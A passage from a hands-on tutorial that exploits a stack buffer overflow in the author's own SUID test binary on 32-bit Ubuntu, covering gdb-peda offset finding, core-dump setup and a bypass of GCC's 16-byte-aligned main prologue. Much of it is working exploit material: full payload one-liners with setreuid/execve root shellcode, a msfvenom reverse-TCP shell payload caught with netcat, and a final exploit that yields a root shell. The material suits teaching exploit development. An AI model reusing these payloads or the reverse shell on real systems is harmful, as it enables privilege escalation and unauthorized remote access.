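    payload = body + b"A" * junk + struct.pack("<I", ret_addr)
    if b"\x00" in payload:
        raise ValueError("strcpy would stop at the first NUL byte")
    return payload


placeholder = b"\xcc" * 33           # stands in for the 33-byte shellcode
p = build_payload(placeholder, 0xBFFFEDE8)
print(len(p), p.count(b"A"))         # 136 35
```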

Now I change the owner and the group of the executable file to root and set the SUID bit (chmod +s also sets SGID) so that the setreuid(0,0) call from the shellcode takes effect; then I execute the above command in the debugger.

$ sudo chown root overflow
$ sudo chgrp root overflow
$ sudo chmod +s overflow

Spawning the shell and executing the id command

So the process now runs the /bin/dash shell (execve doesn’t create a new process but replaces the image of the current one). By the way, in Debian and Ubuntu, /bin/sh is a symlink to /bin/dash.

After executing the id command, I see that I still have only user rights: the kernel does not honor the SUID bit of a program running under a debugger (i.e. traced via ptrace) unless the debugger itself runs as root. Therefore, to get a superuser session, I have to perform the exploitation without the debugger.

Payload after the ESP

If there were not enough memory to place the shellcode within the ‘officially’ allocated buf array, I could try to grab a piece of no man’s memory located beyond the return address, i.e. at and above the address ESP points to after ret. However, this approach is very situational: the size of the memory area that can be overwritten without severe consequences is unpredictable and depends on the current state of the process.

For instance, if I transmit a string consisting of 1000 additional bytes after rewriting the return address, I will see an error of unknown nature related to the ptmalloc_init function.

An error after rewriting memory outside of the stack space

This happened because I brazenly entered a memory area used by other code and started overwriting its data with my own. To display more informative error messages when a program crashes, GDB loads separate debug-symbol files. I temporarily disable them (in my particular case, they aren’t really necessary) and see that the shared C library (libc), which contains the standard functions, complains that I am tampering with memory it uses.

gdb-peda$ show debug-file-directory
The directory where separate debug symbols are searched for is "/usr/lib/debug".
gdb-peda$ set debug-file-directory

The first command shows which directory contains the files with debugging information; the second one sets this path to an empty value, temporarily disabling them.

An error after rewriting memory outside of the stack space (libc)

Using the trial-and-error method, I find out that nothing bad happens if I overwrite 160 bytes beyond the return address.

gdb-peda$ r `python -c 'print "A"*132 + "\xd3\x4d\xc0\xd3"[::-1] + "B"*160'`

The program doesn't crash when I write 160 bytes outside of the stack

Out of academic interest, I am going to generate a payload using MSFvenom, a tool included in Metasploit, and examine the stack layout after injecting this shellcode.

First, I switch to Kali to review the list of available payloads for Linux x86 that don’t use meterpreter (because I cannot use it in Ubuntu).

List of payloads without meterpreter for Linux x86

I select linux/x86/shell_reverse_tcp, specify localhost and port 1337 as the address the reverse shell will connect back to (LHOST and LPORT), encode it with x86/shikata_ga_nai to increase its size, and generate the payload.

root@kali:~# msfvenom -p linux/x86/shell_reverse_tcp -e x86/shikata_ga_nai -a x86 --platform linux LHOST=127.0.0.1 LPORT=1337 -f c
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of c file: 425 bytes
unsigned char buf[] =
"\xbe\xaf\x6c\xe1\x7e\xd9\xe5\xd9\x74\x24\xf4\x5f\x31\xc9\xb1"
"\x12\x83\xc7\x04\x31\x77\x0e\x03\xd8\x62\x03\x8b\x17\xa0\x34"
"\x97\x04\x15\xe8\x32\xa8\x10\xef\x73\xca\xef\x70\xe0\x4b\x40"
"\x4f\xca\xeb\xe9\xc9\x2d\x83\x96\x29\xce\x52\x01\x28\xce\x51"
"\xe8\xa5\x2f\xe9\x6c\xe6\xfe\x5a\xc2\x05\x88\xbd\xe9\x8a\xd8"
"\x55\x9c\xa5\xaf\xcd\x08\x95\x60\x6f\xa0\x60\x9d\x3d\x61\xfa"
"\x83\x71\x8e\x31\xc3";

As a one-line Python script, my exploit looks as follows:

python -c 'print "A"*132 + "\xbf\xff\xed\xcc"[::-1] + "\x90"*32 + "\xbe\xaf\x6c\xe1\x7e\xd9\xe5\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x12\x83\xc7\x04\x31\x77\x0e\x03\xd8\x62\x03\x8b\x17\xa0\x34\x97\x04\x15\xe8\x32\xa8\x10\xef\x73\xca\xef\x70\xe0\x4b\x40\x4f\xca\xeb\xe9\xc9\x2d\x83\x96\x29\xce\x52\x01\x28\xce\x51\xe8\xa5\x2f\xe9\x6c\xe6\xfe\x5a\xc2\x05\x88\xbd\xe9\x8a\xd8\x55\x9c\xa5\xaf\xcd\x08\x95\x60\x6f\xa0\x60\x9d\x3d\x61\xfa\x83\x71\x8e\x31\xc3" + "\x90"*32 + "A"'

After the shellcode injection, the stack looks as shown below:

Stack layout after the shellcode injection

The picture is similar to the stack layout shown in the first screenshot, but this time, the payload is located after the ESP. Again, I ‘jump’ right into the middle of the NOP sled preceding the shellcode (at the address 0xbfffedcc), and the green frame again marks the stack portion filled with junk A characters:

junk_after_shellcode = available_memory_after_ESP - 2*NOP_sled - shellcode = 160 - 2*32 - 95 = 1 byte
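The size bookkeeping above can be double-checked with a few lines of Python 3. This is only a sketch: the 132-byte offset, the 160-byte budget after ESP, the 32-byte sleds and the 95-byte shellcode length are taken from the text, while the shellcode itself is replaced by a placeholder of the same length.

```python
# Sketch: verify the layout arithmetic of the reverse-shell payload.
# Sizes come from the article; the shellcode body is a placeholder, NOT the msfvenom output.
import struct

OFFSET_TO_RET = 132        # junk needed to reach the saved return address
AVAILABLE_AFTER_ESP = 160  # bytes filled after ESP
NOP_SLED_LEN = 32
SHELLCODE_LEN = 95         # size reported by msfvenom

ret_addr = struct.pack("<I", 0xbfffedcc)          # same bytes as "\xbf\xff\xed\xcc"[::-1]
placeholder_shellcode = b"\xcc" * SHELLCODE_LEN   # int3 bytes as a stand-in

tail_junk_len = AVAILABLE_AFTER_ESP - 2 * NOP_SLED_LEN - SHELLCODE_LEN

payload = (b"A" * OFFSET_TO_RET + ret_addr
           + b"\x90" * NOP_SLED_LEN + placeholder_shellcode
           + b"\x90" * NOP_SLED_LEN + b"A" * tail_junk_len)

print(tail_junk_len)   # 1
print(len(payload))    # 132 + 4 + 160 = 296
```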

I start a local listener on port 1337, run the program, send the malicious string as input, and get the desired shell.

nc communicates with the shell on port 1337

Exploit without GDB

When the program runs outside the debugger, the stack addresses shift (GDB, for example, adds the LINES and COLUMNS variables to the environment, which is stored at the top of the stack), so the malicious string won't work until I correct the return address. I use a core dump to find the new value of this address.

Starting from version 16.04, Ubuntu by default uses the terrible Apport service to generate crash reports, including core dumps. I call it terrible because it takes over /proc/sys/kernel/core_pattern and doesn't let you configure dumps in the traditional way. Therefore, I get rid of it first.

$ sudo vi /etc/default/apport  # set the "enabled" value to "0"
$ sudo systemctl stop apport

Then I slightly change the standard core dump settings (the first three commands must be run as root, for example in a shell opened with su).

# echo 1 > /proc/sys/kernel/core_uses_pid
# echo '/tmp/core-%e-%s-%u-%g-%p-%t' > /proc/sys/kernel/core_pattern
# echo 2 > /proc/sys/fs/suid_dumpable
$ ulimit -c unlimited

Let’s go through the above commands line-by-line.

  1. adding the process PID to the dump file name;
  2. changing the general dump file name template (the available format specifiers are described in the core(5) man page);
  3. enabling dumps of executable files with the SUID bit set; and
  4. removing the size limit for generated dump files in the current shell session.
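To see how the template maps onto a real file name, here is a small Python 3 sketch that decodes a name produced by '/tmp/core-%e-%s-%u-%g-%p-%t'. The helper parse_core_name is hypothetical; the meaning of the specifiers (%e executable name, %s signal number, %u real UID, %g real GID, %p PID, %t UNIX time) follows core(5). Note that %e is truncated to 15 characters by the kernel.

```python
# Sketch: decode a core file name created with the pattern
#   /tmp/core-%e-%s-%u-%g-%p-%t
import os
import signal


def parse_core_name(path):
    """Hypothetical helper: split a core file name into its template fields."""
    name = os.path.basename(path)
    if not name.startswith("core-"):
        raise ValueError("not a core file name: " + name)
    # rsplit from the right keeps executable names containing '-' intact
    exe, sig, uid, gid, pid, ts = name[len("core-"):].rsplit("-", 5)
    return {
        "exe": exe,
        "signal": signal.Signals(int(sig)).name,  # 11 -> SIGSEGV
        "uid": int(uid),
        "gid": int(gid),
        "pid": int(pid),
        "time": int(ts),                          # seconds since the epoch
    }


info = parse_core_name("/tmp/core-overflow-11-1000-1000-8767-1568120200")
print(info)
```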

I use Python to crash the program (this time, from the terminal) by passing it the diagnostic string from before, in which the 'dead code' value 0xd34dc0d3 takes the place of the return address.

$ ./overflow `python -c 'print "A"*132 + "\xd3\x4d\xc0\xd3"[::-1]'`
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAM
Segmentation fault (core dumped)

In accordance with the selected template, the dump is saved in the /tmp directory. I run the debugger and pass it the path to the dump file.

$ gdb ./overflow /tmp/core-overflow-11-1000-1000-8767-1568120200 -q

Then I repeat the manipulations described above (when I was calculating the shellcode location for the first time). In this particular case, in order to ‘jump’ again in the middle of the NOP sled located before the shellcode, I have to change the return address to 0xbfffee2c.

Now I have everything I need to create an elegant script and PWN the vulnerability.

#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Usage: python exploit.py

import struct
from subprocess import call


def little_endian(num):
  """Formatting the address as little-endian."""
  return struct.pack('<I', num)

By default, the exploit automatically runs the program with the required argument. If I want to inject the malicious string manually instead, all I have to do is comment out line 7 of the script, which imports call.

$ python exploit.py
Input: jFX111j
XRh//shh/binRSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# id
uid=0(root) gid=1000(snovvcrash) groups=1000(snovvcrash),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)

As you may remember, I set the SUID bit on the binary earlier; together with the setreuid(0,0) call at the start of the shellcode, this gives me a shell with root privileges without using sudo.

Python 2 is convenient for such scripts because its str type is a plain byte string: print emits bytes such as \x90 unchanged, whereas Python 3 encodes text on output (in UTF-8, \x90 becomes the two bytes \xc2\x90). In addition, pwntools, the most popular module for exploiting binary vulnerabilities, was also written in Python 2 at the time of writing. Unfortunately, pwntools does not work on 32-bit distributions, so I set it aside for now.
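If you prefer Python 3 anyway, the payload has to be built from bytes and written to stdout's binary buffer. The sketch below shows the equivalence between struct.pack('<I', ...) and the [::-1] idiom used in the one-liners, and the encoding pitfall mentioned above. The emit helper is a hypothetical name, not part of the original exploit.

```python
# Sketch: building exploit strings in Python 3, where str is Unicode and bytes is separate.
import struct
import sys

addr = 0xbfffee2c

# struct.pack('<I', ...) yields the same bytes as the Python 2 idiom "\xbf\xff\xee\x2c"[::-1]
packed = struct.pack("<I", addr)
assert packed == b"\xbf\xff\xee\x2c"[::-1]

# Pitfall: a str is encoded on output (usually as UTF-8), so one "\x90" NOP becomes two bytes
nop_utf8 = "\x90".encode("utf-8")
print(nop_utf8)   # b'\xc2\x90'

payload = b"A" * 132 + packed


def emit(data):
    """Write raw bytes to stdout without any text encoding."""
    sys.stdout.buffer.write(data)
    sys.stdout.buffer.flush()
```

Calling emit(payload) at the end of such a script (say, a hypothetical build_payload.py) lets you pass the result to the program with ./overflow "$(python3 build_payload.py)".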

Bypassing the new prologue of the main function

While preparing this article, I noticed that one of the most frequently asked questions from people studying stack overflows concerns the (relatively) new prologue of the main function generated by GCC on Linux. It was introduced to align the stack to a 16-byte boundary, which SSE2 instructions operating on aligned memory need in order to work correctly.

I could not find a suitable example of code for stack overflow demonstration under such conditions; so, let's examine the assembly code generated when the default alignment is not changed during the compilation (i.e. the -mpreferred-stack-boundary flag is not used) and develop an exploit for it.

Theory

If the -mpreferred-stack-boundary=2 flag (see the beginning of the article) is not used, the result is the same as with -mpreferred-stack-boundary=4 (GCC's default): the stack frame of the main function is aligned to 2^4 = 16 bytes.

I recompile the program and request the assembly code listing.

$ gcc -g -Wall -Werror -O0 -m32 -fno-stack-protector -z execstack -no-pie -Wl,-z,norelro -o overflow overflow.c
$ gdb -batch -ex 'file ./overflow' -ex 'disas main'

Dump of assembler code for function main:
   0x0804841b <+0>:     lea    ecx,[esp+0x4]
   0x0804841f <+4>:     and    esp,0xfffffff0
   0x08048422 <+7>:     push   DWORD PTR [ecx-0x4]
   0x08048425 <+10>:    push   ebp
   0x08048426 <+11>:    mov    ebp,esp
   0x08048428 <+13>:    push   ecx
   0x08048429 <+14>:    sub    esp,0x84
   0x0804842f <+20>:    mov    eax,ecx
   0x08048431 <+22>:    mov    eax,DWORD PTR [eax+0x4]
   0x08048434 <+25>:    add    eax,0x4
   0x08048437 <+28>:    mov    eax,DWORD PTR [eax]
   0x08048439 <+30>:    sub    esp,0x8
   0x0804843c <+33>:    push   eax
   0x0804843d <+34>:    lea    eax,[ebp-0x88]
   0x08048443 <+40>:    push   eax
   0x08048444 <+41>:    call   0x80482f0 
   0x08048449 <+46>:    add    esp,0x10
   0x0804844c <+49>:    sub    esp,0x8
   0x0804844f <+52>:    lea    eax,[ebp-0x88]
   0x08048455 <+58>:    push   eax
   0x08048456 <+59>:    push   0x80484f0
   0x0804845b <+64>:    call   0x80482e0 
   0x08048460 <+69>:    add    esp,0x10
   0x08048463 <+72>:    mov    eax,0x0
   0x08048468 <+77>:    mov    ecx,DWORD PTR [ebp-0x4]
   0x0804846b <+80>:    leave
   0x0804846c <+81>:    lea    esp,[ecx-0x4]
   0x0804846f <+84>:    ret
End of assembler dump.

Let's examine it section by section. First, the prologue has grown compared with the old variant and now consists of seven instructions.

0x0804841b <+0>:  lea  ecx,[esp+0x4]        ; ECX = original ESP + 4 (address of argc)
0x0804841f <+4>:  and  esp,0xfffffff0       ; align ESP down to a multiple of 16
0x08048422 <+7>:  push DWORD PTR [ecx-0x4]  ; push a copy of the return address
0x08048425 <+10>: push ebp
0x08048426 <+11>: mov  ebp,esp
0x08048428 <+13>: push ecx                  ; save ECX (original ESP + 4) at [ebp-0x4]
0x08048429 <+14>: sub  esp,0x84

The main difference is the and esp,0xfffffff0 instruction: it clears the four low bits of ESP, rounding the top of the stack down to a multiple of 16. In other words, ESP has been brutally transformed; so, how can its original value be restored in the epilogue?

For that purpose, the original value (offset by 4) is kept in the ECX register, and the prologue stores two things on the stack.

  1. First, the lea instruction makes ECX point at argc, the first argument of the main function (ESP+4). Then the dword at ECX-4 is pushed onto the stack. Since ECX-4 = (ESP+4)-4 = ESP, that dword is the return address, so a copy of it now sits right above the new frame.
  2. Next, after the already-familiar part of the classic prologue (push ebp; mov ebp,esp), ECX itself is pushed onto the stack so that the epilogue can reload it (mov ecx,DWORD PTR [ebp-0x4]) and rebuild the original ESP from it. Note also that additional memory (0x84 bytes instead of 0x80) is allocated this time: together with the 12 bytes pushed after the alignment, this gives 12 + 0x84 = 144 = 9 × 16 bytes, so ESP stays a multiple of 16.
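The arithmetic of this prologue and the matching epilogue can be replayed in a few lines of Python. This is a toy model, assuming only register values matter (memory contents are ignored); the range of starting ESP values is arbitrary and chosen to resemble the addresses in this article.

```python
# Sketch: replay the register arithmetic of main's aligning prologue/epilogue (32-bit).
MASK32 = 0xffffffff


def prologue(orig_esp):
    ecx = (orig_esp + 0x4) & MASK32   # lea ecx,[esp+0x4]
    esp = orig_esp & 0xfffffff0       # and esp,0xfffffff0
    esp -= 4                          # push DWORD PTR [ecx-0x4]  (copy of the return address)
    esp -= 4                          # push ebp
    ebp = esp                         # mov ebp,esp
    esp -= 4                          # push ecx  -> stored at [ebp-0x4]
    esp -= 0x84                       # sub esp,0x84
    return ecx, ebp, esp


def epilogue(saved_ecx):
    # mov ecx,[ebp-0x4]; leave; lea esp,[ecx-0x4] -> ESP points at the original return address
    return (saved_ecx - 0x4) & MASK32


for orig_esp in range(0xbfffee50, 0xbfffee60, 4):
    ecx, ebp, esp = prologue(orig_esp)
    assert esp % 16 == 0              # 12 bytes pushed + 0x84 = 144 = 9 * 16
    assert ebp - 0x88 == esp          # buf (ebp-0x88) sits at the top of the frame
    assert epilogue(ecx) == orig_esp  # the original ESP is recovered
print("prologue/epilogue arithmetic checks out")
```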

The code between the prologue and the epilogue remains basically the same as in the first case. The only difference is that the arguments of the main function are accessed relative to the ECX register (mov eax,ecx; mov eax,DWORD PTR [eax+0x4] loads argv).

As for the epilogue, two instructions have been added to it: mov ecx,DWORD PTR [ebp-0x4] reloads the saved ECX, and lea esp,[ecx-0x4] uses it to restore the original ESP value so that the function can return successfully with the ret instruction.

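0x08048468 <+77>: mov    ecx,DWORD PTR [ebp-0x4]  ; reload the saved ECX (original ESP + 4)
0x0804846b <+80>: leave                          ; mov esp,ebp; pop ebp
0x0804846c <+81>: lea    esp,[ecx-0x4]           ; restore the original ESP value
0x0804846f <+84>: ret                            ; pop eip (eip = [esp]; esp += 4)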

By the way, such a prologue is generated only for the main function. If the program had more functions, main would keep ESP 16-byte aligned at each call, so the functions it calls would have classical prologues and epilogues.

The stack layout of the main function changes accordingly, because the additional ECX value has to be saved on the stack as well.
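The EBP-relative addresses in the disassembly translate directly into offsets from the start of buf, which is what the pattern-based measurements below should reproduce. A minimal sketch, assuming only the offsets visible in the listing above; the real return address lies further up, past an alignment gap of 0 to 12 bytes.

```python
# Sketch: offsets (from the start of buf) of the values main keeps above it,
# derived from the EBP-relative addresses in the disassembly.
BUF = -0x88        # lea eax,[ebp-0x88]
SAVED_ECX = -0x4   # push ecx / mov ecx,DWORD PTR [ebp-0x4]
SAVED_EBP = 0x0    # push ebp; mov ebp,esp
RET_COPY = 0x4     # push DWORD PTR [ecx-0x4]

offsets = {
    "saved ECX": SAVED_ECX - BUF,
    "saved EBP": SAVED_EBP - BUF,
    "return address copy": RET_COPY - BUF,
}
print(offsets)   # {'saved ECX': 132, 'saved EBP': 136, 'return address copy': 140}
```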

Stack layout for the main overflow.c function aligned to a 16-byte boundary

Let's see how these changes affect the exploitation.

Practice

What happens if I examine a program compiled this way using the same methodology as at the beginning of this article?

To be on the safe side, I generate a unique pattern 200 characters in length and try to find out the distance to EIP.

Behavior of the program compiled without -mpreferred-stack-boundary=2 after sending a 200-byte pattern to it

  • EIP points to a seemingly random address.
  • The offset value cannot be determined based on the ESP value (the unique pattern sent to the program as input does not include such a sequence of bytes).
  • It is possible to determine the offset of the saved EBP address.

gdb-peda$ pattern offset 0x41514141
1095844161 found at offset: 136
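PEDA's pattern create / pattern offset commands rely on the same idea as the sketch below: every 4-byte window of the pattern is unique, so a 32-bit value read from a register identifies its position. This is a generic de Bruijn construction written for illustration; it is not PEDA's exact pattern, so its bytes (and the register values you would see) differ from the ones above, while the offsets are found the same way.

```python
# Sketch: cyclic pattern generation and offset lookup with a de Bruijn sequence.
import struct


def de_bruijn(alphabet, n):
    """Classic recursive de Bruijn sequence B(k, n) over `alphabet` (a bytes object)."""
    k = len(alphabet)
    a = [0] * k * n
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq)


def pattern_create(length, alphabet=b"ABCDEFGHIJ"):
    # 10 symbols and windows of 4 give 10**4 = 10000 bytes, plenty for 200
    return de_bruijn(alphabet, 4)[:length]


def pattern_offset(value, pattern):
    """value: 32-bit register content; in memory it was stored little-endian."""
    return pattern.find(struct.pack("<I", value))


pat = pattern_create(200)
saved_ebp = struct.unpack("<I", pat[136:140])[0]   # what EBP would hold after the overflow
print(pattern_offset(saved_ebp, pat))              # 136
```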

Because I have already analyzed the assembler code, everything should now fall into place: by sending a long enough string to the program as input, I overwrote all critical values in the stack.

First: the saved ECX has been overwritten; as a result, the ESP register contains the value 0x6c41414c ('LAAl'), which is nothing more than 0x6c414150 - 4, where 0x6c414150 is the 'PAAl' sequence found in the generated pattern at offset 132 (i.e. starting with the 133rd character). The lea esp,[ecx-0x4] instruction in the epilogue is responsible for this.

gdb-peda$ pattern offset 0x6c414150
1816215888 found at offset: 132
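The relation between the two values is easy to check: read the four pattern bytes as a little-endian dword, subtract 4 the way lea esp,[ecx-0x4] does, and convert back to bytes.

```python
# Sketch: 'PAAl' in the pattern -> saved ECX -> ESP after the epilogue.
import struct

ecx_from_pattern = struct.unpack("<I", b"PAAl")[0]   # bytes 50 41 41 6c read little-endian
assert ecx_from_pattern == 0x6c414150

esp_after_epilogue = ecx_from_pattern - 4            # lea esp,[ecx-0x4]
assert esp_after_epilogue == 0x6c41414c
print(struct.pack("<I", esp_after_epilogue))         # b'LAAl'
```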

Second: ESP has been overwritten; as a result, EIP now points to a nonexistent value because ret tried to go to 0x6c414150 (marked by the blue frame). The instruction push DWORD PTR [ecx-0x4] from the prologue, where ecx-0x4 = (esp+0x4)-0x4 = 0x6c414150, is responsible for this.

Third: EBP has been overwritten; as a result, there is junk in its place; however, the offset to its saved value was calculated correctly.

Here is another example: I send a 132-byte pattern, which is equal to the amount of memory allocated for the buffer.

Behavior of the program compiled without -mpreferred-stack-boundary=2 after sending a 132-byte pattern to it

It looks like a miracle: EIP has been successfully overwritten, and I can even calculate the offset.

gdb-peda$ pattern offset 0x48414132
1212236082 found at offset: 60

But the offset is equal to 60. How can it be that the return address is nearly in the middle of the memory area allocated for local variables? And why in the world has an overflow occurred if the length of the sent string is equal to the array size?

The situation is not crystal clear, but it can still be explained. When I send a 132-byte pattern, I actually write 133 bytes, not 132: strcpy also copies the null terminator that marks the end of every C string. The buf array 'legitimately' takes the first 132 bytes, while the null byte lands on the least significant byte of the saved ECX value. This does not divide ECX by 256; it clears its lowest byte (ECX & 0xffffff00), which lowers it by up to 255. That is enough: after lea esp,[ecx-0x4], ESP (and therefore the location from which ret takes the new EIP) ends up 'inside' buf.
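The effect of that single null byte can be illustrated numerically. The values below are assumptions for illustration only: buf is taken to start at 0xbfffedc0 (the address captured later in this section, in a slightly different run), and the saved ECX is a hypothetical 0xbfffee54; any saved ECX of the form 0xbfffeeXX gives the same result.

```python
# Sketch: strcpy's terminating NUL overwriting the low byte of the saved ECX.
BUF_ADDR = 0xbfffedc0       # assumed start of buf
saved_ecx = 0xbfffee54      # hypothetical original value of the saved ECX

clobbered_ecx = saved_ecx & 0xffffff00   # low byte replaced by 0x00
new_esp = clobbered_ecx - 4              # lea esp,[ecx-0x4]

print(hex(clobbered_ecx))                # 0xbfffee00
print(saved_ecx - clobbered_ecx)         # 84: lowered by the old low byte, not divided by 256
print(new_esp - BUF_ADDR)                # 60: ret reads its target from buf[60:64]
```

With these assumed addresses, the arithmetic lands on the same offset of 60 that PEDA reported above.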

Nevertheless, I can still overwrite EIP and even execute my shellcode, but only in this particular case, because the rounded-down ESP happens to fall inside the array. In other situations, this method won't work; so, I have no choice but to look for a more elegant exploitation technique.

All I have to do is 'capture' the value of the stack frame top prior to its destruction (i.e. prior to the execution of the leave instruction) to be able to restore the correct ESP value before it is aligned. To do so, I set a breakpoint at the address 0x0804846b (see the assembly code listing) and run the program with a diagnostic string 136 bytes in length consisting of junk characters (136 = buf + ecx = 132 + 4).

gdb-peda$ b *0x0804846b
gdb-peda$ r `python -c 'print "A"*136'`

Capturing the ESP value

I've got the required value: ESP = 0xbfffedc0. Now I simply add 4 to it (compensating for the lea esp,[ecx-0x4] instruction in the epilogue) and overwrite EIP with the 'dead code' using the following malicious string.

gdb-peda$ r `python -c 'print "\xd3\x4d\xc0\xd3"[::-1] + "A"*128 + "\xbf\xff\xed\xc4"[::-1]'`

Proof of Concept: EIP has been overwritten

My payload now has the format return_address + junk + saved_ESP. The last four bytes overwrite the saved ECX. The epilogue reloads that value (0xbfffedc4) into ECX, subtracts 4 and puts the result into ESP, so the top of the restored stack (0xbfffedc0) points at the very beginning of the payload, where ret finds 0xd34dc0d3.
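The sequence can be replayed on a toy, byte-addressed memory model. This is a sketch under one assumption: buf starts at 0xbfffedc0, the ESP value captured at the breakpoint, so EBP = buf + 0x88 as the disassembly implies.

```python
# Sketch: replay main's epilogue on the proof-of-concept payload.
import struct

BUF_ADDR = 0xbfffedc0   # assumed: ESP captured at the breakpoint before leave
payload = struct.pack("<I", 0xd34dc0d3) + b"A" * 128 + struct.pack("<I", 0xbfffedc4)
assert len(payload) == 136   # 132 bytes up to the saved ECX + 4 bytes of ECX

memory = {BUF_ADDR + i: byte for i, byte in enumerate(payload)}   # toy memory


def read_dword(addr):
    return struct.unpack("<I", bytes(memory[addr + i] for i in range(4)))[0]


ebp = BUF_ADDR + 0x88
ecx = read_dword(ebp - 0x4)   # mov ecx,DWORD PTR [ebp-0x4]
esp = ecx - 0x4               # leave; lea esp,[ecx-0x4]
eip = read_dword(esp)         # ret
print(hex(ecx), hex(esp), hex(eip))   # 0xbfffedc4 0xbfffedc0 0xd34dc0d3
```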

Therefore, I must place the shellcode in buf itself, starting at the address I write into the saved ESP slot (0xbfffedc4). As you remember, there are two 32-byte NOP sleds 'wrapping' the payload, and I need to 'jump' exactly into the middle of the first NOP sled (0xbfffedd4 = 0xbfffedc4 + 16). So, the final version of the exploit is as follows.

ret_addr  = '\xbf\xff\xed\xd4'[::-1]
junk      = 'A' * 31
nop_sled  = '\x90' * 32
saved_esp = '\xbf\xff\xed\xc4'[::-1]

# setreuid(0,0) + execve("/bin/sh", ["/bin/sh", NULL])
shellcode = '\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80'

payload = ret_addr + nop_sled + shellcode + nop_sled + junk + saved_esp
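The layout of this payload can be sanity-checked with a Python 3 sketch. Assumptions: buf starts at 0xbfffedc0 as measured above, and the 33-byte setreuid + execve shellcode is replaced by a placeholder of the same length, since only the sizes and offsets matter here.

```python
# Sketch: check the final payload layout with a placeholder instead of the shellcode.
import struct

BUF_ADDR = 0xbfffedc0
SHELLCODE_LEN = 33                    # length of the setreuid + execve shellcode above
shellcode = b"\xcc" * SHELLCODE_LEN   # int3 placeholder

ret_addr = struct.pack("<I", 0xbfffedd4)
nop_sled = b"\x90" * 32
saved_esp = struct.pack("<I", 0xbfffedc4)
junk = b"A" * (132 - len(ret_addr) - 2 * len(nop_sled) - SHELLCODE_LEN)

payload = ret_addr + nop_sled + shellcode + nop_sled + junk + saved_esp

assert len(junk) == 31
assert len(payload) == 136
assert payload.find(saved_esp) == 132             # overwrites the saved ECX
first_sled = range(BUF_ADDR + 4, BUF_ADDR + 4 + 32)
assert 0xbfffedd4 in first_sled                   # the jump lands inside the first sled
print(hex(0xbfffedd4 - first_sled.start))         # 0x10: 16 bytes into the sled
```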

In the form of a one-line Python script, it looks as shown below:

gdb-peda$ r `python -c 'print "\xbf\xff\xed\xd4"[::-1] + "\x90"*32 + "\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x90"*32 + "A"*31 + "\xbf\xff\xed\xc4"[::-1]'`

Final exploitation: getting shell and executing id

Victory! The game is over.

